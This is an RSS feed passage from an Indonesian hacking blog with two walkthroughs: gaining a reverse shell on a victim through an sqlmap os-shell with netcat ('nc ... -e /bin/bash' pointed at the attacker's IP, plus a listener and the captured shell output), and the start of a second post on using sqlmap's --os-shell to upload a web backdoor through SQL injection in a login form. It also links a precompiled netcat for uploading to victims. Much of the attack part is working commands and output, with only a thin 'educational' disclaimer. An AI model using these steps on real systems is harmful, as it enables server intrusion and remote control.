Attacker&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Back Connect memungkinkan attacker untuk mendapatkan shell korban. Ini seperti kasus bertelefon.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;A -&amp;gt; Nomer Telepon -&amp;gt; B&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika B adalah attacker, maka A akan berusaha menghubungi B dengan nomer telepon milik B. Perbedaannya dengan Back Connect, adalah back connect membutuhkan port tertentu untuk melakukan listening terhadap koneksi yang masuk. Contoh. Dalam sebuah kasus, Attacker mengeksploitasi korban dan memerintahkan korbah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;"Kau harus menghubungiku di IP address xxx.xxx.xxx.xxx pada port xxx"&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perintah ini akan dilakukan oleh korban yang terkena eksploitasi. Dalam hal ini, attacker telah menyediakan port masuk kepada korban. Pengaturan port sendiri tidak bisa sembarangan. Port yang digunakan untuk listening, tidak boleh port yang telah digunakan oleh service lain, seperti port 445 milik samba, port 21 milik ftp, port 22 milik ssh, atau port 80 milik apache. Gunakanlah port yang belum terpakai. Maka listener akan berjalan. Ketika proses listening telah berjalan, maka korban akan datang pada IP address yang telah ditentukan attacker, dan masuk lewat port yang disediakan attacker. Apa tidak berbahaya jika ada yang masuk ke dalam port kita? Tidak. Attacker telah mengatur prosedur sedemikian rupa, sehingga ketika terjadi hubungan, maka akan ada yang diekseksi. Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Victim [cmd.exe or /bin/bash] -&amp;gt; Port Listener -&amp;gt; Attacker&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ketika korban berhasil masuk ke port listener milik attacker, maka cmd.exe atau /bin/bash akan dieksekusi oleh korban sehingga attacker dapat mengatur command prompt [Windows] milik korban, atau mengatur bash [UNIX] milik korban.&lt;/div&gt;&lt;div&gt;Pada tutorial kali ini, saya masih menggunakan Virtual OS pada localhost untuk menghindari dampak buruk dari tutorial ini.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;EULA (End User License Agreement)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="color: red;"&gt;Penulis membuat tutorial ini dengan tujuan edukasi, penyalah gunaan skill yang didapatkan dari tutorial ini, diluar tanggung jawab penulis.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://sqlmap.sourceforge.net/" target="_blank"&gt;SQLmap&lt;/a&gt;&amp;nbsp;&lt;i&gt;&lt;span style="color: lime;"&gt;(dapat ditemukan pada backtrack)&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://netcat.sourceforge.net/" target="_blank"&gt;Netcat&lt;/a&gt;&amp;nbsp;&lt;i&gt;&lt;span style="color: lime;"&gt;(dapat ditemukan pada backtrack)&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Walkthorugh :&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Memerintahkan korban untuk melakukan back connect&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ketahuilah, korban setidaknya harus memiliki netcat. Jika tidak, maka anda harus mengupload netcat pada korban. Anda bisa menggunakan netcat yang sudah dicompile, dan siap pakai, jadi anda tidak perlu melakukan installasi netcat yang membutuhkan privilege root. Netcat bisa anda download di&amp;nbsp;&lt;a href="http://b1tch.ru/localroot/netcat/nc" target="_blank"&gt;sini&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setidaknya anda harus dapat mengeksekusi sebuah perintah ke dalam mesin korban. Pada tutorial kali ini, saya akan menggunakan shell yang tercipta dari SQLmap. "Anda sudah mendapatkan shell, mengapa harus melakukan back connect?". Pertanyaan bagus, shell milik sqlmap tidaklah interactive, sehingga memiliki sejumlah keterbatasan dalam perintah-perintah yang interactive, seperti mengubah password, dan lain sebagainya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk mengeksekusi perintah netcat, anda hanya perlu memasukan perintah berikut.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;os-shell&amp;gt; whereis nc&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;do you want to retrieve the command standard output? [Y/n/a] Y&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;command standard output: &amp;nbsp; &amp;nbsp;'&lt;/span&gt;&lt;span style="color: red;"&gt;nc: /bin/nc.traditional&lt;/span&gt;&lt;span style="color: lime;"&gt; /usr/share/man/man1/nc.1.gz'&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; color: white; font-family: monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: small;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;os-shell&amp;gt; /bin/nc.traditional 10.10.1.1 22 -e /bin/bash&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kebetulan virtual OS yang saya gunakan kali ini, sudah terpasang netcat, sehingga saya tidak perlu lagi mengupload netcat ke server.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Keterangan :&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;10.10.1.1 adalah IP address saya (attacker), sesuaikan dengan IP address anda, dan pastikan anda memiliki IP public, sehingga dapat dihubungi oleh korban.&lt;/li&gt;&lt;li&gt;22 adalah port listener yang saya gunakan, kebetulan saya tidak menjalankan service ssh. Jika service ssh berjalan, maka saya tidak dapat melakukan listening pada port ini.&lt;/li&gt;&lt;li&gt;-e /bin/bash adalah perintah yang tereksekusi ketika koneksi terjadi. Anda harus mengubah -e /bin/bash menjadi -e cmd.exe jika korban anda menggunakan operasi system windows.&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Lakukan listening pada port yang anda tentukan&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sebelum perintah di atas dieksekusi, anda harus melakukan listening pada port yang telah anda tentukan sebelumnya. Hal ini bertujuan agar korban dapat menghubungi attacker dengan baik (berhasil). Jika port listening belum terbuka, dan perintah telah tereksekusi, maka akan terjadi kegagalan koneksi. Ini seperti melakukan sesi ftp pada server yang tidak menjalankan service ftp.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk melakukan listening, anda hanya perlu memasukan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;nc -lvp 22&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian tekan enter, sehingga anda mendapatkan output seperti di bawah ini.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;nc -lvp 22&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;div&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;listening on [any] 22 ...&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Keterangan :&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;-l adalah opsi listening, attacker akan melakukan listening pada setiap koneksi yang masuk. Hal ini seperti stand by untuk dihubungi oleh korban.&lt;/li&gt;&lt;li&gt;-v adalah opsi verbose, opsi ini tidaklah begitu penting. Anda bisa meniadakan opsi ini ketika mengeksekusi perintah netcat.&lt;/li&gt;&lt;li&gt;-p adalah opsi port. Anda diharuskan menetapkan port listening. Anda tidak bisa membiarkan nilai -p kosong. Port bisa diatur pada rentang 1-65535, dengan syarat port tersebut tidak digunakan oleh service lain.&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;3. Game Over.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ekseksusi kedua perintah pada tahap satu dan dua.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-NT8BBN4D0ss/T6eVUC4u3oI/AAAAAAAABY0/Fh8HHZmekxM/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://2.bp.blogspot.com/-NT8BBN4D0ss/T6eVUC4u3oI/AAAAAAAABY0/Fh8HHZmekxM/s320/4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;nc -lvp 22&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;div&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;listening on [any] 22 ...&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;div style="color: lime;"&gt;10.10.1.128: inverse host lookup failed: Unknown host&lt;/div&gt;&lt;div style="color: lime;"&gt;connect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 47195&lt;/div&gt;&lt;div style="color: lime;"&gt;id&lt;/div&gt;&lt;div&gt;&lt;span style="color: red;"&gt;uid=33(www-data) gid=33(www-data) groups=33(www-data)&lt;/span&gt;&lt;/div&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-uNmD_hwBj10/T6eVwG7ZndI/AAAAAAAABY8/zSpd-kGT7pM/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://3.bp.blogspot.com/-uNmD_hwBj10/T6eVwG7ZndI/AAAAAAAABY8/zSpd-kGT7pM/s320/5.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;It's easy, isn't it?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-2632153724629203734?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/05/back-connect-with-sqlmap.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-NT8BBN4D0ss/T6eVUC4u3oI/AAAAAAAABY0/Fh8HHZmekxM/s72-c/4.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-888065353138485013</guid><pubDate>Mon, 07 May 2012 08:36:00 +0000</pubDate><atom:updated>2012-05-07T15:36:21.878+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>shell</category><category domain='http://www.blogger.com/atom/ns#'>SQLmap</category><category domain='http://www.blogger.com/atom/ns#'>spawn</category><title>Spawn Shell With SQLmap</title><description>Belakangan ini, tema post yang saya berikan selalu berbau SQL Injection. Saya harap pembaca tidak bosan membaca tutorial yang saya berikan. Kali ini saya akan menjelaskan bagaimana cara melakukan remote shell dengan metode SQL Injection. Dan pada kesempatan kali ini, saya akan menggunakan SQLmap.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada tutorial ini, pembaca mungkin akan menyadari apa yang membuat SQLmap lebih baik daripada alat SQL Injection yang lainnya. Karena tool ini benar-benar melakukan hal-hal yang sulit dijelaskan bagaimana cara kerjanya. Namun saya masih memahami sedikit dari metode yang digunakan SQLmap.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Metode Spawn Shell&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Attacker -&amp;gt; SQLmap -&amp;gt; Upload [Shell Code] -&amp;gt; Victim&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Alur di atas menjelaskan bahwa attacker menggunakan SQLmap untuk melakukan SQL injeksi, dan mengupload Shell Code pada korban. Hebatnya, anda tidak perlu malakukan log ini ke situs ini untuk mengupload shell code milik anda. Kemudian:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Attacker -&amp;gt; SQLmap -&amp;gt; Shell Code [Arbitrary Command] -&amp;gt; OS Shell&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sementara alur diatas menjelaskan bahwa attacker menggunakan SQLmap untuk menghubungkam dirinya ke backdoor yang telah ter-upload ke korban, dan mengirimkan perintah shell yang kemudian dieksekusi oleh OS Shell (Command Prompt pada Windows, atau Bash pada UNIX).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Shell Code atau backdoor yang dimiliki oleh SQLmap sendiri memiliki sejumlah jenis. Diantaranya ASP, ASPX, PHP, dan JSP. Jenis ini disesuaikan pada engine yang digunakan oleh korban. Pada tutorial kali ini, saya akan menggunakan jenis PHP. Saya tetap menggunakan Virtual OS pada localhost, agar tutorial saya tidak menimbulkan kerugian kepada pihak lain.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation :&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://sqlmap.sourceforge.net/" target="_blank"&gt;SQLmap&lt;/a&gt;&amp;nbsp;&lt;i&gt;&lt;span style="color: lime;"&gt;(dapat ditemukan di backtrack)&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;b&gt;EULA (End User License Agreement)&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Tutorial ini memiliki tujuan edukasi, penyalahgunaan skill yang anda dapatkan dari tulisan ini, diluar tanggung jawab penulis.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Walkthorugh :&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Ketahui celah SQL Injection pada korban&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada tutorial sebelumnya, saya telah menjelaskan bagaimana cara menggunakan SQLmap lebih lanjut, jika tidak ditemukan parameter pada URL dengan bantuan tamper data. Jika anda belum memahaminya, saya sarankan anda membaca kembali postingan sebelumnya mengenai&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-1.html" target="_blank"&gt;SQL Injection Level 4 [Part 1]&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk melakukan spawn shell, anda hanya perlu menambahkan parameter &lt;span style="color: red;"&gt;--os-shell&lt;/span&gt; pada perintah sqlmap.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: lime;"&gt;sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&amp;amp;mypassword=admin&amp;amp;Submit=Login" --drop-set-cookie --ignore-proxy &lt;/span&gt;&lt;span style="color: red;"&gt;--os-shell&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-cF3tsaGGXaQ/T6eEECwlcZI/AAAAAAAABYc/Sv88WrVBeOg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://2.bp.blogspot.com/-cF3tsaGGXaQ/T6eEECwlcZI/AAAAAAAABYc/Sv88WrVBeOg/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Opsi --os-shell ini bertujuan untuk mengupload&amp;nbsp;arbitrary file ke korban, dan membuka shell baru.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Ketahui Engine yang digunakan oleh korban&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kebanyakan SQL injection, menyerang situs yang memiliki basic PHP, dengan database MySQL. Namun tidak berarti selalu PHP yang memiliki kelemahan. Bahawa pemrograman web seperti ASP, ASPX, dan JSP juga dapat melakukan koneksi ke database MySQL. Artinya bahasa pemrograman ini juga memiliki kelemahan (nothing is perfect). Setelah mengeksekusi perintah pada tahap satu, maka anda diharuskan untuk menentukan bahasa pemrograman web apa yang digunakan oleh korban.&lt;/div&gt;&lt;div&gt;&lt;br 